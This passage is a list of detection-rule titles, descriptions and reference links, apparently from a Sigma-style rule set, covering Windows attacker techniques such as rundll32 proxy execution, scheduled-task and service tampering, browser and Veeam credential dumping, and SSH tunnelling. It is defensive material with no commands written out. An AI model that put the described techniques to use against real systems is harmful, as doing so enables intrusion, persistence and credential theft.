https://lolbas-project.github.io/lolbas/Libraries/Setupapi/, https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf, https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf, https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20 |
Shell32 DLL Execution in Suspicious Directory |
Detects shell32.dll executing a DLL in a suspicious directory |
https://www.group-ib.com/resources/threat-research/red-curl-2.html |
Potential ShellDispatch.DLL Functionality Abuse |
Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" |
https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ |
RunDLL32 Spawning Explorer |
Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Potentially Suspicious Rundll32 Activity |
Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities |
http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/, https://twitter.com/Hexacorn/status/885258886428725250, https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://twitter.com/nas_bench/status/1433344116071583746, https://twitter.com/eral4m/status/1479106975967240209, https://twitter.com/eral4m/status/1479080793003671557 |
Suspicious Control Panel DLL Load |
Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits |
https://twitter.com/rikvduijn/status/853251879320662017, https://twitter.com/felixw3000/status/853354851128025088 |
Suspicious Rundll32 Execution With Image Extension |
Detects the execution of Rundll32.exe with DLL files masquerading as image files |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
Suspicious Usage Of ShellExec_RunDLL |
Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack |
https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009 |
Suspicious ShellExec_RunDLL Call Via Ordinal |
Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands.
Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
|
https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009, https://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html |
ShimCache Flush |
Detects actions that clear the local ShimCache and remove forensic evidence |
https://medium.com/@blueteamops/shimcache-flush-89daff28d15e |
Suspicious Rundll32 Activity Invoking Sys File |
Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
Potentially Suspicious Rundll32.EXE Execution of UDL File |
Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
|
https://trustedsec.com/blog/oops-i-udld-it-again |
Rundll32 Execution With Uncommon DLL Extension |
Detects the execution of rundll32 with a command line that doesn't contain a common extension |
https://twitter.com/mrd0x/status/1481630810495139841?s=12 |
Rundll32 UNC Path Execution |
Detects rundll32 execution where the DLL is located on a remote location (share) |
https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code |
Suspicious Workstation Locking via Rundll32 |
Detects a suspicious call to the user32.dll function that locks the user workstation |
https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ |
Suspicious Modification Of Scheduled Tasks |
Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
Instead they modify the task after creation to include their malicious payload
|
Internal Research, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks |
Suspicious WebDav Client Execution Via Rundll32.EXE |
Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
|
https://twitter.com/aceresponder/status/1636116096506818562, https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/, https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/, https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png, https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ |
WebDav Client Execution Via Rundll32.EXE |
Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
|
https://github.com/OTRF/detection-hackathon-apt29/issues/17, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md |
Rundll32 Execution Without Parameters |
Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module |
https://bczyz1.github.io/2021/01/30/psexec.html |
Run Once Task Execution as Configured in Registry |
This rule detects the execution of Run Once task as configured in the registry |
https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/, https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA |
Suspicious Schtasks Execution AppData Folder |
Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Scheduled Task Creation Via Schtasks.EXE |
Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create |
Suspicious Scheduled Task Creation Involving Temp Folder |
Detects the creation of scheduled tasks that involves a temporary folder and runs only once |
https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 |
Delete Important Scheduled Task |
Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities |
Internal Research |
Delete All Scheduled Tasks |
Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete |
Disable Important Scheduled Task |
Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task, https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ |
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE |
Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware |
https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/, https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04, https://blog.talosintelligence.com/gophish-powerrat-dcrat/ |
Schtasks From Suspicious Folders |
Detects scheduled task creations that have suspicious action command and folder combinations |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical |
Suspicious Scheduled Task Name As GUID |
Detects creation of a scheduled task with a GUID like name |
https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Uncommon One Time Only Scheduled Task At 00:00 |
Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 |
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte |
Potential Persistence Via Microsoft Compatibility Appraiser |
Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
|
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ |
Potential Persistence Via Powershell Search Order Hijacking - Task |
Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader |
https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ |
Scheduled Task Executing Payload from Registry |
Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Scheduled Task Executing Encoded Payload from Registry |
Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Suspicious Schtasks Schedule Types |
Detects scheduled task creations or modification on a suspicious schedule type |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
Suspicious Schtasks Schedule Type With High Privileges |
Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create |
Suspicious Scheduled Task Creation via Masqueraded XML File |
Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence |
https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-, https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml |
Suspicious Command Patterns In Scheduled Task Creation |
Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands |
https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/, https://twitter.com/RedDrip7/status/1506480588827467785, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf |
Schtasks Creation Or Modification With SYSTEM Privileges |
Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges |
https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks |
Script Event Consumer Spawning Process |
Detects a suspicious child process of Script Event Consumer (scrcons.exe). |
https://redcanary.com/blog/child-processes/, https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html |
Possible Privilege Escalation via Weak Service Permissions |
Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/30/weak-service-permissions/ |
New Service Creation Using Sc.EXE |
Detects the creation of a new service using the "sc.exe" utility. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md |
Service StartupType Change Via Sc.EXE |
Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" |
https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
New Kernel Driver Via SC.EXE |
Detects creation of a new service (kernel driver) with the type "kernel" |
https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ |
Interesting Service Enumeration Via Sc.EXE |
Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
|
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/ |
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE |
Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. |
https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings |
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE |
Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. |
https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings |
Service DACL Abuse To Hide Services Via Sc.EXE |
Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. |
https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ |
Service Security Descriptor Tampering Via Sc.EXE |
Detection of sc.exe utility adding a new service with special permission which hides that service. |
https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ |
Suspicious Service Path Modification |
Detects service path modification via the "sc" binary to a suspicious command or path |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html |
Potential Persistence Attempt Via Existing Service Tampering |
Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. |
https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/ |
Stop Windows Service Via Sc.EXE |
Detects the stopping of a Windows service via the "sc.exe" utility |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11) |
Potential Shim Database Persistence via Sdbinst.EXE |
Detects installation of a new shim using sdbinst.exe.
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
|
https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence |
Uncommon Extension Shim Database Installation Via Sdbinst.EXE |
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md |
Sdclt Child Processes |
A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. |
https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md |
Sdiagnhost Calling Suspicious Child Process |
Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) |
https://twitter.com/nao_sec/status/1530196847679401984, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/, https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/ |
Potential Suspicious Activity Using SeCEdit |
Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy |
https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit |
Suspicious Serv-U Process Pattern |
Detects a suspicious process pattern which could be a sign of an exploited Serv-U service |
https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ |
Uncommon Child Process Of Setres.EXE |
Detects uncommon child process of Setres.EXE.
Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
|
https://lolbas-project.github.io/lolbas/Binaries/Setres/, https://twitter.com/0gtweet/status/1583356502340870144, https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11) |
Potential SPN Enumeration Via Setspn.EXE |
Detects service principal name (SPN) enumeration used for Kerberoasting |
https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation, https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019 |
Setup16.EXE Execution With Custom .Lst File |
Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
Attackers and adversaries might leverage this as a living of the land utility.
|
https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/ |
Suspicious Execution of Shutdown |
Use of the commandline to shutdown or reboot windows |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown |
Suspicious Execution of Shutdown to Log Out |
Detects the rare use of the command line tool shutdown to logoff a user |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown |
Uncommon Sigverif.EXE Child Process |
Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
|
https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/, https://twitter.com/0gtweet/status/1457676633809330184 |
Uncommon Child Processes Of SndVol.exe |
Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) |
https://twitter.com/Max_Mal_/status/1661322732456353792 |
Audio Capture via SoundRecorder |
Detect attacker collecting audio via SoundRecorder application. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html |
Suspicious Splwow64 Without Params |
Detects suspicious Splwow64.exe process without any command line parameters |
https://twitter.com/sbousseaden/status/1429401053229891590?s=12 |
Suspicious Spool Service Child Process |
Detects suspicious print spool service (spoolsv.exe) child processes. |
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md |
Veeam Backup Database Suspicious Query |
Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
VeeamBackup Database Credentials Dump Via Sqlcmd.EXE |
Detects dump of credentials in VeeamBackup dbo |
https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html |
SQLite Chromium Profile Data DB Access |
Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. |
https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ |
SQLite Firefox Profile Data DB Access |
Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ |
Arbitrary File Download Via Squirrel.EXE |
Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ |
Process Proxy Execution Via Squirrel.EXE |
Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ |
Port Forwarding Activity Via SSH.EXE |
Detects port forwarding activity via SSH.exe |
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Program Executed Using Proxy/Local Command Via SSH.EXE |
Detect usage of the "ssh.exe" binary as a proxy to launch other programs. |
https://lolbas-project.github.io/lolbas/Binaries/Ssh/, https://github.com/LOLBAS-Project/LOLBAS/pull/211/files, https://gtfobins.github.io/gtfobins/ssh/, https://man.openbsd.org/ssh_config#ProxyCommand, https://man.openbsd.org/ssh_config#LocalCommand |
Potential RDP Tunneling Via SSH |
Execution of ssh.exe to perform data exfiltration and tunneling through RDP |
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Potential Amazon SSM Agent Hijacking |
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. |
https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ |
Execution via stordiag.exe |
Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe |
https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html, https://twitter.com/eral4m/status/1451112385041911809 |
Start of NT Virtual DOS Machine |
Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications |
https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support, https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7, https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/, https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/ |
Abused Debug Privilege by Arbitrary Parent Processes |
Detection of unusual child processes by different system processes |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg |
User Added to Local Administrators Group |
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". |
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 |
User Added To Highly Privileged Group |
Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". |
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
User Added to Remote Desktop Users Group |
Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". |
https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ |
Execute From Alternate Data Streams |
Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md |
Always Install Elevated Windows Installer |
Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg |
Potentially Suspicious Windows App Activity |
Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution |
https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
Arbitrary Shell Command Execution Via Settingcontent-Ms |
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. |
https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 |
Phishing Pattern ISO in Archive |
Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) |
https://twitter.com/1ZRR4H/status/1534259727059787783, https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ |
Automated Collection Command Prompt |
Once established within a system or network, an adversary may use automated techniques for collecting internal data. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
Bad Opsec Defaults Sacrificial Processes With Improper Arguments |
Detects attackers using tooling with bad opsec defaults.
E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
|
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/, https://www.cobaltstrike.com/help-opsec, https://twitter.com/CyberRaiju/status/1251492025678983169, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32, https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool, https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool |
Potential Suspicious Browser Launch From Document Reader Process |
Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
|
https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/, https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/ |
Potential Browser Data Stealing |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
Web browsers typically store the credentials in an encrypted format within a credential store.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md |
Suspicious Child Process Created as System |
Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://github.com/antonioCoco/RogueWinRM, https://twitter.com/Cyb3rWard0g/status/1453123054243024897 |
Potential Commandline Obfuscation Using Escape Characters |
Detects potential commandline obfuscation using known escape characters |
https://twitter.com/vysecurity/status/885545634958385153, https://twitter.com/Hexacorn/status/885553465417756673, https://twitter.com/Hexacorn/status/885570278637678592, https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques, https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ |
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image |
Detects potential commandline obfuscation using unicode characters.
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
|
https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http |
Potential Command Line Path Traversal Evasion Attempt |
Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline |
